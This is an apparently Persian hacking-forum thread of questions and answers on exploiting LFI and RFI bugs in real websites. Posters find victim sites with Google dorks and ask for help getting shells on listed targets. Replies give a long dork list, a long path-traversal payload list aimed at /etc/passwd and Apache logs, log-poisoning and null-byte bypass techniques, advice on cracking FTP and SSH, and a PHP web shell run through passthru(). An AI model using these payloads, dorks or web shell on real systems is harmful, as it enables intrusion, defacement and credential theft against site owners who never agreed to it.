به دلیل زیاد شدن تاپیک های سوال در مورد Rfi and LFI از این به بعد تمام سوال های در این حوزه در این تاپیک باید پرسیده بشه ...!! ( مانند تاپیک هکر های تازه وارد)
اینطوری می شه بانک کاملی از سوال و جواب در این مورد که تو یک تاپیک متمرکز هست رو درست کرد و اعضا تازه وارد هم می تونند به جواب سوالاتشون که قبلا توسط فرد دیگری پرسیده شده برسند
از این به بعد ایجاد تاپیک و سوال در مورد LFI and RFI در سایر بخش ها ممنوع است ( رجوع شود به قوانین سایت بند 19)
نکته : فایل های اموزشی و ... رو در این تاپیک قرار ندید
توجه :قبل از سوال پرسیدن بهتره این تاپیک رو ببینید : تاپیک جامع آموزش باگ های LFI and RFI
([Only registered and activated users can see links])
برگرفته از سخنان کلانتر سایت

elvator
تمام پستهای اسپم پاک شدند
دوستانی که میخان lfi و rfi یاد بگریرند لطفا اول تاپیک بالا رو مشاهده کنند
دوستان تنبلمون هم که مستقیم اینجا پست میدند و سوال هایی جز بحثمون میپرسند پستشون حذف و اخطار دریافت میکنند
بدرود

ممنون به خاطر تاپیکتون

آقا من تا الان چندین و چندتا باگ RFI پیدا کردم ولی توشون هیچ کار نمیشه کرد حتی فایل هارو هم نمیشه خوند روی هرچی کلیک می کنم هر کامندی وارد می کنم هر کار می کنم فقط صفحه REFRESH میشه هیچ اتفاقی نمیفته !!!! باید چی کار کنم ؟:-S

----------------

یه سوال دیگه ! یه اسکنر می شناسید که آدرس Log های یک باگ LFI رو پیدا کنه ؟thumbsup

ممنون به خاطر تاپیکتون

آقا من تا الان چندین و چندتا باگ rfi پیدا کردم ولی توشون هیچ کار نمیشه کرد حتی فایل هارو هم نمیشه خوند روی هرچی کلیک می کنم هر کامندی وارد می کنم هر کار می کنم فقط صفحه refresh میشه هیچ اتفاقی نمیفته !!!! باید چی کار کنم ؟:-s

----------------

یه سوال دیگه ! یه اسکنر می شناسید که آدرس log های یک باگ lfi رو پیدا کنه ؟thumbsup

سلام

لطفا در صورت امکان لینک تارگت ها رو بزارید که روش بحث بشه.

موفق باشی

سلام دوستان :
گاهی اوقات میفهمم که برخی چیزا رو فلج یاد گرفتم
اگر کسی در مورد LFI چیزای مفهومی میدونه کمک کنه:


ببینید من اول از گوگل یک قربانی انتخاب کردم:

d0rk:::: inurl:eStore/index.cgi?

وقربانی من:

[Only registered and activated users can see links]

و بعد اکسپلویت رو بهش اضافه کردم.

xpl:: eStore/index.cgi?page=../../../../../../../../etc/passwd

و حال میخواهم به کمک شما نتیجه ی انالیز تک تک خروجی اسیب پذیر را بدانم :

در ضمن روشهای پیدا کردن تارگت هم اگه بگین ممنون میشم...

سلام دوستان :
گاهی اوقات میفهمم که برخی چیزا رو فلج یاد گرفتم
اگر کسی در مورد LFI چیزای مفهومی میدونه کمک کنه:


ببینید من اول از گوگل یک قربانی انتخاب کردم:

d0rk:::: inurl:eStore/index.cgi?

وقربانی من:

[Only registered and activated users can see links]

و بعد اکسپلویت رو بهش اضافه کردم.

xpl:: eStore/index.cgi?page=../../../../../../../../etc/passwd

و حال میخواهم به کمک شما نتیجه ی انالیز تک تک خروجی اسیب پذیر را بدانم :

در ضمن روشهای پیدا کردن تارگت هم اگه بگین ممنون میشم...

عزیزم انالیز نداره که شما به وسیله یک باگ lfi به صورت لوکال یکی از فایل های روی سرور رو باز کردی حالا این فایل passwd هست یعنی یوزر های موجود رویه سرور

اوصلا از lfi برای باگ یابی دوباره استفاده می کنن یعنی میرن سرور بقیه فایل هارو باز میکنن و از بقیه صفحه ها یک باگ بهتر گیر میارن
البته روش های دیگه هم هست که اصلا شما میتونی یک شل کد به یکی از فایل های روی سرور مثل فایل خطا اپاچی تزریق کنی و استفاده کنی

که این رو در مباحث پیشرفته دوستان می گن

سلام.
خسته نباشيد.
من تارگت پيدا كردم --> [Only registered and activated users can see links]
چرا نميره تو etc/password ?
[Only registered and activated users can see links]

سلام


دوست عزیز
اولا که اصلا از Include اسفتاده نشده!!!
اصلا ورودی شما توی پیغام خطا نمیاد!!!
یعنی اصلا کاری صورت نمیگیره و یا به عبارتی آسیب پذیری وجود نداره !!!!
هرجا که No such file or directory رو دیدی که نباید فکر کنی LFI هست...

چیزی که ما توی URL میدیم :


[Only registered and activated users can see links]


چیزی که در حال حاضر می بینیم :


Warning: main(menu1.php) [function.main]: failed to open stream: No such file or directory in /hsphere/local/home/deschem/desconoxychem.com/newsdetail.php on line 33

چیزی کا باید ببینی ولی نمی بینی !!! :

Warning: main(khorojiiiiiiiimenu1.php) [function.main]: failed to open stream: No such file or directory in /hsphere/local/home/deschem/desconoxychem.com/newsdetail.php on line 33

سلام دوست عزيزم آقاي Mehdy007 .
ممنون كه داري سطح علمي بچه ها رو ميبري بالا.
بنده يه سوالي داشتم كه ETC/PASSWORD و در ميارم ولي درproc/self/environ اكسس ندارم صفحاتم همش خالي مياد اين به معني اينه كه نميتونم اصلا كاري كنم يا راهاي ديگه اي هم دارم.
باز ممنون .

سلام

موقعی که شما به رproc/self/environ دسترسی نداری،راه دیگه اینه که بگردی Access Log رو روی اون سرور پیدا کنید و از طریق تبدیل LFI به RCE کار رو دنبال کنید.و یا اینکه راه دیگه ای که براتون هست اینه که سورس فایلهای روی سرور رو بخونید تا شاید توی صفحات دیگه باگ های دیگه ای پیدا کنید.


اصلا چرا نميايد تو اين تاپيك مرحله به مرحله به وسيله RFI يا LFI يه تارگت و بزنيد تا بچه ها كاملا بفهمند؟


شما میتونی به تاپیک تاپیک جامع آموزش باگ های LFI and RFI ([Only registered and activated users can see links]) مراجعه کنید که کم کم داره کامل میشه.
موفق باشی

دوستان گیر کار من چیه؟؟!!!



Warning: include() [function.include]: open_basedir restriction in effect. File(../../../../htdocs/index.php.php) is not within the allowed path(s): (/home/[Only registered and activated users can see links]) in /home/[Only registered and activated users can see links] on line 276

Warning: include(../../../../htdocs/index.php.php) [function.include]: failed to open stream: Operation not permitted in /home/[Only registered and activated users can see links] on line 276

Warning: include() [function.include]: Failed opening '../../../../htdocs/index.php.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/[Only registered and activated users can see links] on line 276

سلام

دوست عزیز اولا که شما باید اعبارت زائد بعد از دستوراتتون رو با استفاده از 00% حذف کنید .
ثانیا وقتی از 00% استفاده میکنید میبینید


Warning: include() [function.include]: open_basedir restriction in effect. File(../../../../../../../../../../../../../../../../../../etc/passwd\0.php) is not within the allowed path(s): (/home/[Only registered and activated users can see links]) in /home/[Only registered and activated users can see links] on line 276



که انتهای اعبارتتون یه 0\ اضافه میکنه که نشون دهنه اینه که در تنضیمات PHP روی این سرور Magic Quotes gpc فعال هست و شما نمیتونی از 00% استفاده کنی!!!

در ضمن اگه دقت کنید میبینید که در اینجا از open_basedir استفاده شده یعنی برنامه نویس ورودی رو محدود به پوشه خاصی کرده و شما فقط به پوشه های مانند :
/home/[Only registered and activated users can see links]
/usr/share/php
/tmp
دسترسی دارید، که با وجود فعال بودن Magic Quotes کاری نمیشه کرد.
موفق باشی

اقا من etc/passwd

رو در اوردم بعدش چیکار کنم

چرا یه فیلم کامل از صفر تا دیفیس درست نمیکنید

سلام رجوع شود به تاپیک جامع آموزش باگ های LFI and RFI ([Only registered and activated users can see links])

فیلم هم بزودی آپلود میشه.

موفق باشی

دوستان من بعد از کلی سرچ بالاخره یه تارگت Lfi پیدا کردم که از شانس بده من هیچ کاری باهاش نمیتونم بکنم...:(
اینم تارگت :
[Only registered and activated users can see links]
حالا اگه کسی میتونه فیلم شل گیری این رو بسازه برام !!! :-S

سلام
دوست من پست ها رو بدقت بخونین!
روی سرور شما Magic Quotes gpc فعال هست توی پست 21 کاملا توضیح داده شده مشکل شما!

Warning: include(log/../../../../etc/passwd\0) [function.include]: failed to open stream: No such file or directory in /home/tvringel/html/index.php on line 62


موفق باشی

ببخشیدا شاید سوالم خنده دار باشه برای هک rfi , lfi از کدوم شل باید استفاده کرد ؟

سلام رجوع شود به تاپیک جامع آموزش باگ های LFI and RFI ([Only registered and activated users can see links])

فیلمی در مورد باگ های LFI و نحوه دیفیس کردن با این باگ !

البته این فیلم ماله قبله ! و رو لوکال هست ! اما اگه کار کنید راه میوفتید !

[Only registered and activated users can see links]

فیلمی که ساختم در مورد متد LDF هست ! که از ابتدای ایجاد باگ تا نحوه کار با باگ و در اخر چگونگی پتچ کردن باگ توضیح داده شده !

[Only registered and activated users can see links]

من هك و شبكه بلدم ولي نميخوام تخريب گر باشم يه سايت داشتم كه وهابيون هكش كردن كمكم كنيد تخريب گر نباشم كمك كنيد چطور از معلوماتم استفاده كنم؟:(:(:(:(:(

سلام خسته نباشید دوستان من مبتدی هستم و تازه ای دی اس ال گرفتم منو 3 روز پیش هک کردن و تا الان 2.5 گیگ از شارژم رفته تا تموم نکرده همه ی شارژم رو لطفا کمکم کنید ممنون

عرض سلام به انجمن تخصصی اشیانه خوش امدید دوست عزیز heart


متاسفانه شما جای مناسبی برای ارسال پست انتخاب نکردین lo1ad


اکانت شما به احتمال قوی از طریق روتر adsl هک شده و چون احتمالا نوع اکانت شما به صورت PPPOE بوده یعنی user/pass تو پنل روتر ذخیره شده و یوزر پسورد دیفالت روتر رو هکر استفاده کرده و وقتی به پنل نفود کرده یوزر پسورد رو خوند و الان داره از اکانت شما استفاده میکنه

اولین کار اینه که به شرکت زنگ بزنی بگی پسورد رو عوض کنن lo1ad
دومین کار اینه که پسورد روتر رو عوض کنی lo1ad
و سومین کار نوع اتصال رو از PPPOE به بریج تغییر بدی lo1ad

اگه در انجام این مراحل مشکلی داشتید بگید تا راهنمایی کنم

موفق باشید

سلام
من میخواستم در مورد نحوه استفاده از این هک :
[Only registered and activated users can see links]
اطلاعاتی کسب کنم ، اگر توضیح بصورت فیلم باشه که عالیه

ممنون heartheartheart

نیاز به فیلم نیست
این یک ماژول به نام JInventory برای جوملا هست که باگ LFI داره
اکسپلوت برای استفاده از این باگ هم این هست (برای مثلا)
[Only registered and activated users can see links]

سلام به همه اساتيد
من تازه امنيت رو شروع كردم و براي تست يك سايت رو انتخاب كردم و فهميدم مي تونم تزريق روش انجام بدم
فهميدم ديتا بيسش access هست و حتي جمله اي كه بايى تزريق بشه هم فهميدم
ali';
اما بعد از ; بايد غير فعال بشه كاري كه در sql كالراكتر هاي -- انجام مي دن
اما در access اين كار رو انجام نمي دن من ده كاراكتري بايد استفاده كنم تا باقي دستور رو توضيحات فرض كنه؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
ممنون از سايت عالي و مقاله هاي خوبتون

4. در هنگام مطرح کردن مطالب خود ، انجمن مناسب را انتخاب نمایید و از ارسال آنها در انجمن های نامتناسب با مطلبتان خودداری نمایید.

11. از نوشتن یک مطلب در انجمن های مختلف خودداری کنید. طبق قانون شماره 4 انجمن مناسب و مرتبط به مطلب خود را انتخاب کنید و فقط در آن انجمن مطلب خود را ارسال کنید.

سلام دوستان من تازه عضو سایت شدم و از هک هیچی نمیدونم ممکنه بگین برای آموزش هک بکدوم تایپیک باید برم.متشکرمthumbsupthumbsupthumbsupthumbsu pthumbsup

سلام
اقا توی چند جمله جواب بدید :91:
1- چه علامتی اضافه کنم تا ببینم اسیپ پذیر هست
2- فرق اون با sql چیست

ممنون :tongue:

سلام
اقا توی چند جمله جواب بدید :91:
1- چه علامتی اضافه کنم تا ببینم اسیپ پذیر هست
2- فرق اون با sql چیست

ممنون :tongue:

در مرحله اول معمولا با اضافه کردن کاراکتر های غیر معمولی مانند ' و... در صورت گرفتن ارور include یا .. به وجود باگ پی میبریم.
در مرحله دوم هم اگه اروری وجود نداشت میشه به صورت دستی اقدام به پیدا کردن باگ کرد مثلا با اضافه کردن آدرس دایرکتوری ها مثل /etc/passwd و..

با سلام

من مشکلم تو LFI اینه که چجوری میشه بهش نفوذ کرد اون دستور /etc/passwd ررو میدونم ولی بعدش چیکار باید کرد ؟ برای بدست اوردن یوزر و پس چیکار باید کرد؟ لطفا یکی از بچه ها تارگت LFI که داره سیر حمله به اون تا اپلود شل رو یک توضیح جامع بده ممنون


با تشکر

دروود
نگاه شما بعد از اينگه etc/passwd رو خوندي ميتوني چند تا كار انجام بدب . يك شما ميتوني ftp or ssh كرك كني . etc/passwd رو كه بخوني كل ليست ها رو بهت ميده ديگه با يه كرك ميتوني remot بري براي كرك كردن ftp سايت هاي رويه سرور

اول كه شما etc/passwd رو خوندي برو proc/self/environ رو هم بخون ببين accept اگه ميده . حله ديگه ميري براي شل آپ كردن. اگه نشد ميري براي كرك كردن .

بدروود:26:

سلام
ببخشید اقا من فقط در صورتی که ارور include را دریافت کردم یعنی rfi داره ؟؟
یه سوال دیگه حالا rfi یا lfi چه فرقی داره ؟
خوب وقتی /etc/passwd زدم باید ارور بده ؟
مرسی استاد :78:

مختصره ولی به دردت میخوره:ii

ُسلام
بچه ها ببخشید من یه سوال داشتم
مثلا من برای پیدا کردم تارکت از Sql توی گوگل مثلا سرچ میکردم newscat.php?id= یا ... خوب حالا برای پیدا کردن باک lfi چی باید سرچ کنم
همچنین برای پیدا کردن باک rfi چطور
مرسی

:23:

تو همین تاپیک .دورک فکر کنم هست .اگرم نبود که میدونم هست . سرچ کن یکم بیا اینم سرچ تو آشیانه .
[Only registered and activated users can see links] %B3%D8%A7%D9%8A%D8%AA&q=dork+lfi&siteurl=[Only registered and activated users can see links] %3Ft%3D13520%26page%3D13

اینم گوگل
[Only registered and activated users can see links]

سلام
ببخشید اقا من خودم را گشتم ولی یه تارکت پیدا نکردم
من برای Sql یه برنامه دانلود کردم که خودش توی گوگل میچرخه و تارکت های اسیپ پذیر را میاره ولی باری rfi نیست کسی برنامه ای سراغ داره ؟

اکثر کاربران مثل شما سرچ بلد نیستند .
RFI Dork
[Only registered and activated users can see links]

این هم با اجازه آقای ویرانگر میزارم
تعدادی دارک برای گشتن تو گوگل



inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?theme_dir=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsconfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosconfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myphpcalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?hcl_path=

inurl:/hcl/inc/pipe.php?hcl_path=

inurl:/inc/pipe.php?hcl_path=

inurl:/support/faq/inc/pipe.php?hcl_path=

inurl:/help/faq/inc/pipe.php?hcl_path=

inurl:/helpcenter/inc/pipe.php?hcl_path=

inurl:/live-support/inc/pipe.php?hcl_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.il

allinurl:/index.php?file= site:*.il




acion=
act=
action=
api_home_dir=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
ht=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

این همه بحث کردیم طرف اومده میگه lfi یا rfi ! واقعا که ! برات متاسفم. اخطار رو هم دادم به خاطر تارگت ایرانی.

بشین دوباره lfi و rfi رو یادبگیر !

از صبح دارم میخونم، از یه سایت دیگه هم تونستم shell بگیرم ولی نمیدونم چرا همون یکی نمیشه×××
تنها راه نفوذ از طریق باگ LFI فقط user.agent هست؟!
تاپیک ( [Only registered and activated users can see links] ) رو هم تمامی فیلم هاش + آموزش ها رو خوندم، چیز دیگه ای باقی نمونده؟!

در ضمن، از ممنوع بودن تارگت ایرانی هم مطلع نبودم.

دستت درد نکنه واسه جواب حالا میشه بگی لوگ اپاچی رو از کجا در بیارم؟:92:

توی انجمن بگردی پیدا می کنی

../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../../../../../var/log/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache/error.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
'../../../../../../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../../../../../var/log/error.log%00',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../etc/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../var/log/[Only registered and activated users can see links]',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log

تاپیک رو خوندم

شما هنوز باگ LFI رو یاد نگرفتی و بهتره برین دوباره مقالاتش رو بخونید..:rolleyes:
این سایت هم باگ LFI نداره و XSS هست... :ii

[Only registered and activated users can see links](%27Hacked%27)%3C/script%3E

موفق باشی... :92:

این آموزش رو به صورت local رو سیستم خودم انجام دادم

با دقت به این آموزش میتونید مفهوم باگ RFI رو یاد بگیرید

در ضمن تمام فایل ها رو هم براتون گزاشتم

پیشنهاد میکنم حتما یک بار به صورت local رو سیستم خودتون تست کنید تا نحویه کار این باگ براتون جا بیفته.

با سلام به اساتید آشیانه
لطفا ریپ کردن سایت ها رو آموزش بدید
من می حوام بدونم چطوری میشه سورس سایت ها رو برداشت
سایت پی سی ول چطوری ریپ میکنه؟
ایا نرم افزار داره یا ..
با تشکر

سلام
من توو یه سایت در قسمت ارسال نظرات به جای نام فرستنده یک کوتیشن گذاشتم و خطای زیر رو داد میخوام ببینم میشه ازش استفاده ای برد؟

Microsoft JET Database Engine error '80040e21'

Field 'tblGBComments.Comments' cannot be a zero-length string.

/UsersComments/add_comments.asp, line 423



tankuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
veryyyyyyyyyyyyyyyyyyyyyyyyyy :ii

سلام
من توو یه سایت در قسمت ارسال نظرات به جای نام فرستنده یک کوتیشن گذاشتم و خطای زیر رو داد میخوام ببینم میشه ازش استفاده ای برد؟

microsoft jet database engine error '80040e21'

field 'tblgbcomments.comments' cannot be a zero-length string.

/userscomments/add_comments.asp, line 423



tankuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
veryyyyyyyyyyyyyyyyyyyyyyyyyy :ii

یه کتیشن گذاشتید یعنی یه درخواست به دیتابیس دادید
اینجا چه بخشیه؟
سوالتونو باید در بخش سوال ها و جواب ها در بخش دیتابیس هکینگ درست بخش بالاسر همین تاپیک بپرسید
سرچ هم نکردید , چون اگه سرچ میکردید نزدیک 100 تا تاپیک در مورد این خروجی مشاهده میکردید.
لطفا رعایت کنید و سوالاتونو هرجا نپرسید.

خروجیتون باگ جت دیتا بیس رو به ما نشون میده یعنی امکان اینجکتش هست
پس با یه سرچ میتونید آموزشهاشو پیدا کنید.
اسپم نکنید.

جناب injector در تاپیک target ها یک سری سایت با باگ LFI گزاشتن من هر کاری کردم نتونستم به وسیله tamper data روشون شل آپ کنم من اون تارگت هارو اینجا کپی میکنم اگه میشه و تونستین روی یکیشون شل اپ کنید وبگین چطوری انجام میدین

لطفا حواله ندین به تاپیک آموزش های باگ RFI و LFI اونو کامل خوندم


[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]

با تشکر
Woeful

ُسلام
ببخشید دوستان من یه سوال داشتم این یه باک lfi هست فکر کنم در بالا هم هست بعد مربوط میشه به این لینگ


[Only registered and activated users can see links]

خوب الان یه سری کد اورده با اینها چی کار میشه کرد

[]

سلام


دوست عزیز
اولا که اصلا از Include اسفتاده نشده!!!
اصلا ورودی شما توی پیغام خطا نمیاد!!!
یعنی اصلا کاری صورت نمیگیره و یا به عبارتی آسیب پذیری وجود نداره !!!!
هرجا که No such file or directory رو دیدی که نباید فکر کنی LFI هست...

چیزی که ما توی URL میدیم :


[Only registered and activated users can see links]


چیزی که در حال حاضر می بینیم :



چیزی کا باید ببینی ولی نمی بینی !!! :

------------------------------------------------------------------------
سلام
اینجا هم خروجی هست هم بهش چیزی اضافه شده.یعنی میشه گفت lfi هست؟

Warning: main(./inc_en_board_x.php): failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

Warning: main(./inc_en_board_x.php): failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

Warning: main(./inc_en_board_x.php): failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

Warning: main(): Failed opening './inc_en_board_x.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

سلام دوستان
من میخواهم با استفاده از این باگ ، صفحه ی شلی رو روی سایتی اجرا کنم . برای این کار یک صفحه به نام a.php ساختم که این کد رو براش قرار دادم :



<?php
$page = $_GET['page'];
include($page);
?>

بعد صفحه ی شلی رو روی هاستم ( غیر رایگان ) اپلود کردم . بعد اینطوری خواستم اجرا کنم که هر بار اروری میده :

[Only registered and activated users can see links]



الان کار نمیده . چه کار کنم ؟

ممنون میشم راهنمایی کنید
ایا راه دیگه ای هست که بتونم صفحه ای رو در سایت اجرا کنم؟

با تشکر

سلام دوستان
من میخواهم با استفاده از این باگ ، صفحه ی شلی رو روی سایتی اجرا کنم . برای این کار یک صفحه به نام a.php ساختم که این کد رو براش قرار دادم :



<?php
$page = $_GET['page'];
include($page);
?>

بعد صفحه ی شلی رو روی هاستم ( غیر رایگان ) اپلود کردم . بعد اینطوری خواستم اجرا کنم که هر بار اروری میده :

[Only registered and activated users can see links]



الان کار نمیده . چه کار کنم ؟

ممنون میشم راهنمایی کنید
ایا راه دیگه ای هست که بتونم صفحه ای رو در سایت اجرا کنم؟

با تشکر


دروووود
شما بگير اين كد رو تو يه فايل قرار بده مثلا A
<?php
if(!empty($_GET['cmd'])){
echo'<pre>';
passthru($_GET['cmd']);
echo'</pre>';
exit;
}
?>


بعد از url
اينجوري فراخواني كن .
[Only registered and activated users can see links] dastor

الان اگه بتوني رو سايتت كامند بزني و راحت هر دستوري بزني بهت نشون ميده . ميتوني مثلا شل wget كني . همه چيز ديگه:18:


بدرووود

------------------------------------------------------------------------
سلام
اینجا هم خروجی هست هم بهش چیزی اضافه شده.یعنی میشه گفت lfi هست؟

warning: Main(./inc_en_board_x.php): Failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

warning: Main(./inc_en_board_x.php): Failed to open stream: No such file or directory in /home/hosting_users/globalkorea/[Only registered and activated users can see links] on line 119

